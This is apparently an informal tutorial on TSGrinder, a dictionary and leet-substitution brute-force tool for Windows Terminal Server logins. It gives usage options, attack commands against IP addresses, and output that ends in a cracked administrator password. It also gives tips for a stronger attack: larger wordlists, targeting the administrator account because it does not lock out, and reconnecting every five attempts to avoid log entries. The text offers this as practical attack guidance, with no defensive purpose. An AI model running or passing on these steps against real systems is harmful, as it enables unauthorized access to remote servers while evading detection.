tsgrinder

TSGrinder is a terminal server Brute Force tool. It uses dictionary attacks and has a very useful leet function. Given the leet file and dict file are weak to start with but that is easily remedied. If you run the command you will get the following.
c:\tsgrinder>tsgrinder.exe
tsgrinder version 2.03

Usage:
tsgrinder.exe [options] server

Options:
-w dictionary file (default 'dict')
-l 'leet' translation file
-d domain name
-u username (default 'administrator'
-b banner flag
-n number of simultaneous threads
-D debug level (default 9, lower number is more output)

Example:
tsgrinder.exe -w words -l leet -d workgroup -u administrator -b -n 2 10.1.1.1

The example demonstrates very well how to use this program. So for this example I will be attacking my server.

C:\tsgrinder>tsgrinder.exe -w dict -u administrator 192.168.2.1
password aaa - failed
password abc - failed
password academia - failed
password academic - failed
password access - failed
password ada - failed
password admin - failed
password adrian - failed
password adrianna - failed
password aerobics - failed
password airplane - failed
password password - success!

Once tsgrinder finds the password, it will output success and log off of mstsc. Since the dict file is weak, I recommend googling for a world list file. This will make life a lot easier. The leet file is also pretty weak by default. This is all it has:
l 1
e 3
t 7
s 5
Feel free to edit this by adding some more such as:
a @
o 0
etc.. I also recommend using the administrator account for these attacks, since by default it won't get locked out with so many password attempts. Also, if you noticed, tsgrinder will try 5 passwords, and then disconnects, and then reconnects, and trys 5 more. This is because a log entry won't appear until you get the password wrong on 6 consecutive attempts. This app won't throw a windows log file either. Now for the 1337. You just add the "-l" switch to the command.

C:\tsgrinder>tsgrinder.exe -w dict -l leet -u administrator 192.168.2.3
password academia - failed
password acad3mia - failed
password academic - failed
password acad3mic - failed
password access - failed
password acces5 - failed
password acce5s - failed
password acce55 - failed
password acc3ss - failed
password acc3s5 - failed
password acc35s - failed
password acc355 - failed

That shows you vaguely how it works. There is also the "-n" switch which allows more then 1 session. So with one session you are able to try 5 passwords in 10 seconds, but if you use "-n 2" you will be able to try 10 passwords in 11 seconds. I haven't tried more then 2 simultaneously connections since it does slow your computer down.

C:\tsgrinder>tsgrinder.exe -w dict -u administrator -n 2 192.168.2.3